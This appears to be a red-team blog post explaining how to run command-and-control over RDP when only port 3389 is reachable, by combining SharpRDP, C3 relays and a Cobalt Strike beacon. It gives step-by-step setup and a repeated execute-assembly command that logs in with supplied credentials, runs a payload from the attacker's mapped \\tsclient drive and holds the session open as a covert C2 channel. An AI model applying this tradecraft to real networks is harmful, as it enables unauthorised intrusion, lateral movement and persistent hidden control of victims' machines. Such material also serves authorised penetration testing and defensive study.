C2 over RDP with mapped drives is nothing new, however this post will show how SharpRDP and C3 can be used in tandem through a Cobalt Strike beacon to provide C2 when only 3389 is accessible.

tl;dr

1. In C3 create a new UncShareFile channel with the target folder set to a location on the machine that you’ll be RDP’ing from, i.e. C:\Users\Public\
2. Generate the corresponding C3 Relay but change the target folder to reference the target folder as if it was through an RDP session, i.e. \\tsclient\C\Users\Public
3. Use my modified version of SharpRDP so that you can make use of the exit=false flag, keeping the session alive for C2
4. Upload your payload to a location on the machine that you’ll be RDP’ing from, i.e. C:\Users\Public
5. From your beacon, execute the following command:

   execute-assembly /path/to/SharpRDP.exe computername=<TARGET> command="\\tsclient\C\Users\Public\Payload.exe" username=<USERNAME> password=<PASSWORD> connectdrive=true exit=false
   

6. This is going to create an RDP session with drive mapping enabled, execute Payload.exe from your mapped drive \\tsclient\C\Users\Public\, then keep the session alive so that the same share can be used by C3 for C2.

Instructions

The Scenario

You’ve got a beacon on a target, and have credentials that can RDP to a remote machine. You don’t want to/can’t proxy a real RDP session as the bandwidth isn’t sufficient, and the target only has 3389/TCP exposed inbound with all other inbound/outbound traffic blocked.

This guide assumes you already have a Cobalt Strike beacon and that you’re using C3 for C2. If not then please consult this for instructions on how to configure C3.

C3 Setup

1. From an existing Gateway/Relay, select the AddNegotiationChannelUncShareFile command. Set the Filesystem path to a location on the source machine where C3 should write its C2 packets.

   

2. Close the window and double click this icon.

   

3. From the Interface Options drop down select New Relay

4. Leave everything default except the Filesystem path. This should refer to same directory you specified above, however from the perspective of the target machine you’re going to be RDPing into, i.e. \\tsclient\C\Users\Public. Click Create and Download Relay when done.

   

5. Copy this newly-generated Relay.exe to the source machine. Note: SharpRDP doesn’t like special characters in the command, so name your relays something simple.

   

6. Run my modified version of SharpRDP using execute-assembly with the following command:

    execute-assembly /path/to/SharpRDP.exe computername=<TARGET> command="\\tsclient\C\Users\Public\Payload.exe" username=<USERNAME> password=<PASSWORD> connectdrive=true exit=false
   

   

7. The relay should now appear in the C3 console, meaning C2 has been successfully established.

   

8. To add a beacon through this relay select AddPeripheralBeacon